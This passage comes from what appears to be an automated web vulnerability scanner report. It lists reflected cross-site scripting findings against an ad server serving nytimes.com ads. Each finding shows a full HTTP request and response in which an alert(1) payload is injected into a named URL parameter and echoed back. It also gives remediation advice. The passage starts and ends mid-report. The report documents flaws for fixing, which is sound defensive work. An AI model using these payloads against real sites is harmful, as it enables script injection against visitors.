GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html8d5c6'-alert(1)-'c0cdb14aea7&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:48:45 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 685
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html8d5c6'-alert(1)-'c0cdb14aea7&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/pro ...[SNIP]...
|
3.6. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [p parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N3282.nytimes.comSD6440/B3948326.5 |
Issue detail
The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63430'-alert(1)-'c47c9696e39 was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto63430'-alert(1)-'c47c9696e39&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:48:25 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 685
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto63430'-alert(1)-'c47c9696e39&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b6 ...[SNIP]...
|
3.7. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [pos parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N3282.nytimes.comSD6440/B3948326.5 |
Issue detail
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d7a9'-alert(1)-'b1576cde699 was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C9d7a9'-alert(1)-'b1576cde699&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:13 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 685
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C9d7a9'-alert(1)-'b1576cde699&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p= ...[SNIP]...
|
3.8. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [sn1 parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N3282.nytimes.comSD6440/B3948326.5 |
Issue detail
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae5e4'-alert(1)-'aa8ce901cf was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61ae5e4'-alert(1)-'aa8ce901cf&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:51:48 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 684
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/122/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt ...[SNIP]... opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61ae5e4'-alert(1)-'aa8ce901cf&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19"> ...[SNIP]...
|
3.9. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [sn2 parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N3282.nytimes.comSD6440/B3948326.5 |
Issue detail
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c82b8'-alert(1)-'a4d6eda3c22 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178c82b8'-alert(1)-'a4d6eda3c22&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:50:27 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 685
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178c82b8'-alert(1)-'a4d6eda3c22&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19"> ...[SNIP]...
|
3.10. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [snr parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N3282.nytimes.comSD6440/B3948326.5 |
Issue detail
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cafe4'-alert(1)-'e519a003fdb was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclickcafe4'-alert(1)-'e519a003fdb&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:50:53 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 685
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt ...[SNIP]... com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclickcafe4'-alert(1)-'e519a003fdb&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19"> ...[SNIP]...
|
3.11. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [snx parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N3282.nytimes.comSD6440/B3948326.5 |
Issue detail
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea498'-alert(1)-'f486d2b26f6 was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247ea498'-alert(1)-'f486d2b26f6&sn1=70abef3d/22b41b61&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:51:19 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 685
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt ...[SNIP]... _click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247ea498'-alert(1)-'f486d2b26f6&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19"> ...[SNIP]...
|
3.12. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [ad parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5295.NewYorkTimes/B4885922 |
Issue detail
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c42e"-alert(1)-"eccd2896247 was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x901c42e"-alert(1)-"eccd2896247&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:50:38 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... %7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x901c42e"-alert(1)-"eccd2896247&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa"); var ...[SNIP]...
|
3.13. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [ad parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5295.NewYorkTimes/B4885922 |
Issue detail
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 720f7'-alert(1)-'6112183b0f2 was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90720f7'-alert(1)-'6112183b0f2&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:50:43 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... %7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90720f7'-alert(1)-'6112183b0f2&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\"> ...[SNIP]...
|
3.14. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [camp parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5295.NewYorkTimes/B4885922 |
Issue detail
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40c72"-alert(1)-"dbe1a9ec6e was submitted in the camp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt240c72"-alert(1)-"dbe1a9ec6e&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:50:13 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6747
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt240c72"-alert(1)-"dbe1a9ec6e&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5 ...[SNIP]...
|
3.15. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [camp parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5295.NewYorkTimes/B4885922 |
Issue detail
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d10f2'-alert(1)-'f317ac05d12 was submitted in the camp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2d10f2'-alert(1)-'f317ac05d12&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:50:17 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2d10f2'-alert(1)-'f317ac05d12&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5 ...[SNIP]...
|
3.16. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [goto parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5295.NewYorkTimes/B4885922 |
Issue detail
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8125"-alert(1)-"445d6a35394 was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
